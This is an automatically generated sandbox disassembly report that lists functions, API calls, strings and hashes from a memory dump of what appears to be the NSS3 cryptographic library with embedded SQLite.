API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 501d511a2c935fba8dd8edf7337a92a3112fe19bb0fb5216ef823cb2b55476df
Instruction ID: 69ca2957c3304f1cf8d621525a5f00eb6328e6a21ea3fe3ce06c77e5df175ef1
Opcode Fuzzy Hash: 501d511a2c935fba8dd8edf7337a92a3112fe19bb0fb5216ef823cb2b55476df
Instruction Fuzzy Hash: AED15EB6E016059FEB14CFA9DA84A9EB7F5EF48308F1A8039D915A7711E731F805CB50

Function 6C80DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C7E7FFA,00000000,?,6C8123B9,00000002,00000000,?,6C7E7FFA,00000002), ref: 6C80DE33

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

Part of subcall function 6C80D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C80DE74,6C7E7FFA,00000002,?,?,?,?,?,00000000,6C7E7FFA,00000000,?,6C8123B9,00000002), ref: 6C80D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C7E7FFA,00000000,?,6C8123B9,00000002,00000000,?,6C7E7FFA,00000002), ref: 6C80DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6C80DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C80E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C80E121
PK11_FreeSymKey.NSS3(?), ref: 6C80E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C80E195
PR_GetCurrentThread.NSS3 ref: 6C80E1FC

Part of subcall function 6C802460: PR_SetError.NSS3(FFFFE005,00000000,6C8A7379,00000002,?), ref: 6C802493

Strings

handshake data, xrefs: 6C80DFF7
key, xrefs: 6C80E046
early application data, xrefs: 6C80DFC9
application data, xrefs: 6C80DFE0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: abf14c28f1875e95b16ac34b1cfe3772ec4919128a39fe5489df3c8e0095b40a
Instruction ID: 5520fc2bd636a5a2540c92ceb917f4e4b9ad83d6d5bec16e14446bc7aa5586d8
Opcode Fuzzy Hash: abf14c28f1875e95b16ac34b1cfe3772ec4919128a39fe5489df3c8e0095b40a
Instruction Fuzzy Hash: 19C1E9B1B002159BDB24CF69CE80B9BB7B4FF45318F044939E9099BA51E731E954CBD1

Function 6C6FECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C6FEF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FF483
database corruption, xrefs: 6C6FF48D
%s at line %d of [%.10s], xrefs: 6C6FF492

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: a30b69d882eed7191bafa3ed60cb5ccfae66eb7cd8a2db8ebd294ca7875f1d99
Instruction ID: 0bbef9ad1e11d9eca32513bc49ffabdc85b5b9bf6e4b944088ff0a93152af5ad
Opcode Fuzzy Hash: a30b69d882eed7191bafa3ed60cb5ccfae66eb7cd8a2db8ebd294ca7875f1d99
Instruction Fuzzy Hash: 13623470A042458FDB14CF68C484B9ABBF3BF45318F1841A8D8655BB92D735E887CBDA

Function 6C79FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C79FD06

Part of subcall function 6C79F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C79F696
Part of subcall function 6C79F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C79F789
Part of subcall function 6C79F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C79F796
Part of subcall function 6C79F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C79F79F
Part of subcall function 6C79F670: SECITEM_DupItem_Util.NSS3 ref: 6C79F7F0

Part of subcall function 6C7C3440: PK11_GetAllTokens.NSS3 ref: 6C7C3481
Part of subcall function 6C7C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C7C34A3
Part of subcall function 6C7C3440: TlsGetValue.KERNEL32 ref: 6C7C352E
Part of subcall function 6C7C3440: EnterCriticalSection.KERNEL32(?), ref: 6C7C3542
Part of subcall function 6C7C3440: PR_Unlock.NSS3(?), ref: 6C7C355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C79FDAD

Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C779003,?), ref: 6C7CFD91
Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(A4686C7D,?), ref: 6C7CFDA2
Part of subcall function 6C7CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7D,?,?), ref: 6C7CFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C79FE00

Part of subcall function 6C7CFD80: free.MOZGLUE(00000000,?,?), ref: 6C7CFDD1

Part of subcall function 6C7BE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7BE5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C79FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C79FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C79FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C79FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C79FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C79FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C7A0007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C7A0029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C7A0044

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 2f69d9767bcbde1ab265ad489a429d2aad9b95ff5c8ce15309228b1c2719df09
Instruction ID: 195df34a070f04e50560be0ff320d85cd9b2a676cc1d20ee9c5763b9e87ec43d
Opcode Fuzzy Hash: 2f69d9767bcbde1ab265ad489a429d2aad9b95ff5c8ce15309228b1c2719df09
Instruction Fuzzy Hash: FDB1E571604301AFE704CF29D944A6BB7E6FF88308F548A2DF95A87B41E730E944CB91

Function 6C797D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C797DDC

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C797DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C797F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C797F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C797F98
PK11_FreeSymKey.NSS3(?), ref: 6C797FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C797FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C798000

Part of subcall function 6C7B9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C797F0C,?,00000000,00000000,00000000,?), ref: 6C7B943B
Part of subcall function 6C7B9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C7B946B
Part of subcall function 6C7B9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C7B9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C798110
PK11_FreeSymKey.NSS3(00000000), ref: 6C79811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C79822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C79823C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 846235b57e2cc2836d34d49f7c1ecb7196d7c85a6ad62ba06a833ca98a543e7b
Instruction ID: 015e3d9f589eb75fca914dff26e1e5f9d9ecdfd4cab28997545bfee6148b0598
Opcode Fuzzy Hash: 846235b57e2cc2836d34d49f7c1ecb7196d7c85a6ad62ba06a833ca98a543e7b
Instruction Fuzzy Hash: 43C17DB1D402199FEB21CF14DD45FEAB7B8AF05348F0081EAE81DA6641E7319E85CFA1

Function 6C7A0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C7A0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C7A1006
PK11_FreeSymKey.NSS3(?), ref: 6C7A101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7A1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7A103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C7A1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7A10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A112E

Part of subcall function 6C7A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7A08C4,?,?), ref: 6C7A15B8
Part of subcall function 6C7A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7A08C4,?,?), ref: 6C7A15C1
Part of subcall function 6C7A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A162E
Part of subcall function 6C7A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A1637

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 800eac017df7b5578c5618e243948afce98fe04ed16e473711d7e53ec1296b69
Instruction ID: 648cf5e0dc039e84ab95eae6494ed58bcec0cc0c7b35c3f818ab6970a461ecd8
Opcode Fuzzy Hash: 800eac017df7b5578c5618e243948afce98fe04ed16e473711d7e53ec1296b69
Instruction Fuzzy Hash: BA71C275A00205CFEB04CFAACA84A6BB7B5BF48318F14863CE51997711E771D946CB81

Function 6C7C1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C7C1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C7C2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C7C228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C7C23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7C241C

Strings

model, xrefs: 6C7C23CB, 6C7C23EC
token, xrefs: 6C7C1F2C
manufacturer, xrefs: 6C7C2179
serial, xrefs: 6C7C22A2

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: df6b0f1ee8879d2ea513861dfa71cf2b7fea364813e9d91c1795b67c1e2a0c61
Instruction ID: e49d40d1b172e9b782d54fd158606e765bb609440cd955a57349cd68678d2935
Opcode Fuzzy Hash: df6b0f1ee8879d2ea513861dfa71cf2b7fea364813e9d91c1795b67c1e2a0c61
Instruction Fuzzy Hash: 75024FA2F0C7C96EF7318271C64C3D76AE09B45328F1D667EC5DE46683C7A859888353

Function 6C7C6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C3F

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C60
PR_ExplodeTime.NSS3(00000000,6C771C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C94

Strings

gfff, xrefs: 6C7C6D9C
gfff, xrefs: 6C7C6CF5
gfff, xrefs: 6C7C6D66
gfff, xrefs: 6C7C6CFD
gfff, xrefs: 6C7C6D30

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 7f720350263b342a041b7d2ae3a4ed76665f160bd2f34ba5cefc27872817462f
Instruction ID: 681b7aeb5f430fe867485bc7599c717d3cfb1e23e302fc388df6404fb078efdf
Opcode Fuzzy Hash: 7f720350263b342a041b7d2ae3a4ed76665f160bd2f34ba5cefc27872817462f
Instruction Fuzzy Hash: E5516C72B016494FC718CDADDD926EAB7DAABA4310F48C23AE442CB785D638E906C751

Function 6C840F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C841027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8410B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C841353

Strings

%02x, xrefs: 6C8412F6
-- , xrefs: 6C840FF5
$, xrefs: 6C8412A0
zeroblob(%d), xrefs: 6C841223
NULL, xrefs: 6C84119E
%lld, xrefs: 6C84114B
'%.*q', xrefs: 6C841217, 6C841292

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 4c3c39a90c14b2e6307d597470d2a5f48bb13c0b354b101d613ceff82853ead3
Instruction ID: d3061a1e66b2eadc918e1518c58445a908042a25074db100b96c1343e0efc227
Opcode Fuzzy Hash: 4c3c39a90c14b2e6307d597470d2a5f48bb13c0b354b101d613ceff82853ead3
Instruction Fuzzy Hash: C5E1B071A08344DFD724CF18C680A6BBBF1AF85348F448D2DE98587B51E775E859CB82

Function 6C848FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C848FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8490DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C849118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C84915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8491C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C849209

Strings

UUUU, xrefs: 6C849255
3333, xrefs: 6C84925E

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 6d8ca38df0b9cbae2f54ccab00ac5c9cdf48f635ff2e0c509141a5fc82a4d6cc
Instruction ID: c4411d26438112cfc2024d85e3dfef920f933b84509d7860b721a11a6e08c168
Opcode Fuzzy Hash: 6d8ca38df0b9cbae2f54ccab00ac5c9cdf48f635ff2e0c509141a5fc82a4d6cc
Instruction Fuzzy Hash: CBA19172E001199BDB24CB68CE91B9EB7B5BF88324F098579D915A7741E736AC01CBD0

Function 6C700FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C70103E
EnterCriticalSection.KERNEL32(?), ref: 6C701139
LeaveCriticalSection.KERNEL32(?), ref: 6C701190
sqlite3_free.NSS3(00000000), ref: 6C701227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C70126E
sqlite3_free.NSS3(?), ref: 6C70127F

Strings

winAccess, xrefs: 6C70129B
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C701267

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: bad670f76c0f15e98ef159babe40eb2dc7dd27e38ffecda068c7806a68a43e9c
Instruction ID: 293b713447c27e9020d90465aaacffe91bdc2ea968b8dc026b4912c6bafc8eb4
Opcode Fuzzy Hash: bad670f76c0f15e98ef159babe40eb2dc7dd27e38ffecda068c7806a68a43e9c
Instruction Fuzzy Hash: 5971E7B17052019BEB289F64DE85A6A33F6FB8636CF144639E91187A81DB30ED05C7D2

Function 6C70AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?), ref: 6C70B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B0A2
CloseHandle.KERNEL32(?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?,?,?), ref: 6C70B100
sqlite3_free.NSS3(?,?,00000002,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?), ref: 6C70B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B12D

Part of subcall function 6C6F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C70C6FD,?,?,?,?,6C75F965,00000000), ref: 6C6F9F0E
Part of subcall function 6C6F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C75F965,00000000), ref: 6C6F9F5D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
